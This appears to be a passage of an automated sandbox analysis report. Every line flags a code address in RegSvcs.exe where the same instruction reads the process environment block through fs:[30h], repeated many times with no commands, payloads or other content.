Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FF113 mov eax, dword ptr fs:[00000030h]	4_2_012FF113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132510F mov eax, dword ptr fs:[00000030h]	4_2_0132510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130510D mov eax, dword ptr fs:[00000030h]	4_2_0130510D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01306179 mov eax, dword ptr fs:[00000030h]	4_2_01306179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0135717A mov eax, dword ptr fs:[00000030h]	4_2_0135717A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0135717A mov eax, dword ptr fs:[00000030h]	4_2_0135717A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133716D mov eax, dword ptr fs:[00000030h]	4_2_0133716D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FA147 mov eax, dword ptr fs:[00000030h]	4_2_012FA147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FA147 mov eax, dword ptr fs:[00000030h]	4_2_012FA147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FA147 mov eax, dword ptr fs:[00000030h]	4_2_012FA147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D3157 mov eax, dword ptr fs:[00000030h]	4_2_013D3157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D3157 mov eax, dword ptr fs:[00000030h]	4_2_013D3157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D3157 mov eax, dword ptr fs:[00000030h]	4_2_013D3157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133415F mov eax, dword ptr fs:[00000030h]	4_2_0133415F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139314A mov eax, dword ptr fs:[00000030h]	4_2_0139314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139314A mov eax, dword ptr fs:[00000030h]	4_2_0139314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139314A mov eax, dword ptr fs:[00000030h]	4_2_0139314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0139314A mov eax, dword ptr fs:[00000030h]	4_2_0139314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D5149 mov eax, dword ptr fs:[00000030h]	4_2_013D5149
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013341BB mov ecx, dword ptr fs:[00000030h]	4_2_013341BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013341BB mov eax, dword ptr fs:[00000030h]	4_2_013341BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013341BB mov eax, dword ptr fs:[00000030h]	4_2_013341BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D51B6 mov eax, dword ptr fs:[00000030h]	4_2_013D51B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013331BE mov eax, dword ptr fs:[00000030h]	4_2_013331BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013331BE mov eax, dword ptr fs:[00000030h]	4_2_013331BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E1A4 mov eax, dword ptr fs:[00000030h]	4_2_0133E1A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E1A4 mov eax, dword ptr fs:[00000030h]	4_2_0133E1A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341190 mov eax, dword ptr fs:[00000030h]	4_2_01341190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01341190 mov eax, dword ptr fs:[00000030h]	4_2_01341190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01329194 mov eax, dword ptr fs:[00000030h]	4_2_01329194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01304180 mov eax, dword ptr fs:[00000030h]	4_2_01304180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01304180 mov eax, dword ptr fs:[00000030h]	4_2_01304180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01304180 mov eax, dword ptr fs:[00000030h]	4_2_01304180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013101F1 mov eax, dword ptr fs:[00000030h]	4_2_013101F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013101F1 mov eax, dword ptr fs:[00000030h]	4_2_013101F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013101F1 mov eax, dword ptr fs:[00000030h]	4_2_013101F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F1F0 mov eax, dword ptr fs:[00000030h]	4_2_0132F1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132F1F0 mov eax, dword ptr fs:[00000030h]	4_2_0132F1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F81EB mov eax, dword ptr fs:[00000030h]	4_2_012F81EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C81EE mov eax, dword ptr fs:[00000030h]	4_2_013C81EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013C81EE mov eax, dword ptr fs:[00000030h]	4_2_013C81EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132B1E0 mov eax, dword ptr fs:[00000030h]	4_2_0132B1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A1E3 mov eax, dword ptr fs:[00000030h]	4_2_0130A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A1E3 mov eax, dword ptr fs:[00000030h]	4_2_0130A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A1E3 mov eax, dword ptr fs:[00000030h]	4_2_0130A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A1E3 mov eax, dword ptr fs:[00000030h]	4_2_0130A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130A1E3 mov eax, dword ptr fs:[00000030h]	4_2_0130A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013091E5 mov eax, dword ptr fs:[00000030h]	4_2_013091E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013091E5 mov eax, dword ptr fs:[00000030h]	4_2_013091E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F91F0 mov eax, dword ptr fs:[00000030h]	4_2_012F91F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F91F0 mov eax, dword ptr fs:[00000030h]	4_2_012F91F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013101C0 mov eax, dword ptr fs:[00000030h]	4_2_013101C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013101C0 mov eax, dword ptr fs:[00000030h]	4_2_013101C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013151C0 mov eax, dword ptr fs:[00000030h]	4_2_013151C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013151C0 mov eax, dword ptr fs:[00000030h]	4_2_013151C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013151C0 mov eax, dword ptr fs:[00000030h]	4_2_013151C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013151C0 mov eax, dword ptr fs:[00000030h]	4_2_013151C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FD02D mov eax, dword ptr fs:[00000030h]	4_2_012FD02D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342010 mov ecx, dword ptr fs:[00000030h]	4_2_01342010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01325004 mov eax, dword ptr fs:[00000030h]	4_2_01325004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01325004 mov ecx, dword ptr fs:[00000030h]	4_2_01325004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01308009 mov eax, dword ptr fs:[00000030h]	4_2_01308009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01307072 mov eax, dword ptr fs:[00000030h]	4_2_01307072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01306074 mov eax, dword ptr fs:[00000030h]	4_2_01306074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01306074 mov eax, dword ptr fs:[00000030h]	4_2_01306074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013A9060 mov eax, dword ptr fs:[00000030h]	4_2_013A9060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301051 mov eax, dword ptr fs:[00000030h]	4_2_01301051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01301051 mov eax, dword ptr fs:[00000030h]	4_2_01301051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D505B mov eax, dword ptr fs:[00000030h]	4_2_013D505B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01330044 mov eax, dword ptr fs:[00000030h]	4_2_01330044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01386040 mov eax, dword ptr fs:[00000030h]	4_2_01386040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D50B7 mov eax, dword ptr fs:[00000030h]	4_2_013D50B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013400A5 mov eax, dword ptr fs:[00000030h]	4_2_013400A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BB0AF mov eax, dword ptr fs:[00000030h]	4_2_013BB0AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013860A0 mov eax, dword ptr fs:[00000030h]	4_2_013860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013AF0A5 mov eax, dword ptr fs:[00000030h]	4_2_013AF0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01387090 mov eax, dword ptr fs:[00000030h]	4_2_01387090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FA093 mov ecx, dword ptr fs:[00000030h]	4_2_012FA093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D4080 mov eax, dword ptr fs:[00000030h]	4_2_013D4080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FC090 mov eax, dword ptr fs:[00000030h]	4_2_012FC090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133D0F0 mov eax, dword ptr fs:[00000030h]	4_2_0133D0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133D0F0 mov ecx, dword ptr fs:[00000030h]	4_2_0133D0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F90F8 mov eax, dword ptr fs:[00000030h]	4_2_012F90F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F90F8 mov eax, dword ptr fs:[00000030h]	4_2_012F90F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F90F8 mov eax, dword ptr fs:[00000030h]	4_2_012F90F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F90F8 mov eax, dword ptr fs:[00000030h]	4_2_012F90F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FC0F6 mov eax, dword ptr fs:[00000030h]	4_2_012FC0F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131B0D0 mov eax, dword ptr fs:[00000030h]	4_2_0131B0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB0D6 mov eax, dword ptr fs:[00000030h]	4_2_012FB0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB0D6 mov eax, dword ptr fs:[00000030h]	4_2_012FB0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB0D6 mov eax, dword ptr fs:[00000030h]	4_2_012FB0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FB0D6 mov eax, dword ptr fs:[00000030h]	4_2_012FB0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FE328 mov eax, dword ptr fs:[00000030h]	4_2_012FE328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FE328 mov eax, dword ptr fs:[00000030h]	4_2_012FE328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012FE328 mov eax, dword ptr fs:[00000030h]	4_2_012FE328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013D3336 mov eax, dword ptr fs:[00000030h]	4_2_013D3336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01338322 mov eax, dword ptr fs:[00000030h]	4_2_01338322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01338322 mov eax, dword ptr fs:[00000030h]	4_2_01338322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01338322 mov eax, dword ptr fs:[00000030h]	4_2_01338322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132332D mov eax, dword ptr fs:[00000030h]	4_2_0132332D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131E310 mov eax, dword ptr fs:[00000030h]	4_2_0131E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131E310 mov eax, dword ptr fs:[00000030h]	4_2_0131E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0131E310 mov eax, dword ptr fs:[00000030h]	4_2_0131E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F9303 mov eax, dword ptr fs:[00000030h]	4_2_012F9303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_012F9303 mov eax, dword ptr fs:[00000030h]	4_2_012F9303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133631F mov eax, dword ptr fs:[00000030h]	4_2_0133631F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013BF30A mov eax, dword ptr fs:[00000030h]	4_2_013BF30A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138330C mov eax, dword ptr fs:[00000030h]	4_2_0138330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138330C mov eax, dword ptr fs:[00000030h]	4_2_0138330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138330C mov eax, dword ptr fs:[00000030h]	4_2_0138330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0138330C mov eax, dword ptr fs:[00000030h]	4_2_0138330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E372 mov eax, dword ptr fs:[00000030h]	4_2_0137E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E372 mov eax, dword ptr fs:[00000030h]	4_2_0137E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E372 mov eax, dword ptr fs:[00000030h]	4_2_0137E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0137E372 mov eax, dword ptr fs:[00000030h]	4_2_0137E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0132237A mov eax, dword ptr fs:[00000030h]	4_2_0132237A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01380371 mov eax, dword ptr fs:[00000030h]	4_2_01380371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01380371 mov eax, dword ptr fs:[00000030h]	4_2_01380371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B360 mov eax, dword ptr fs:[00000030h]	4_2_0130B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B360 mov eax, dword ptr fs:[00000030h]	4_2_0130B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B360 mov eax, dword ptr fs:[00000030h]	4_2_0130B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B360 mov eax, dword ptr fs:[00000030h]	4_2_0130B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B360 mov eax, dword ptr fs:[00000030h]	4_2_0130B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0130B360 mov eax, dword ptr fs:[00000030h]	4_2_0130B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0133E363 mov eax, dword ptr fs:[00000030h]	4_2_0133E363
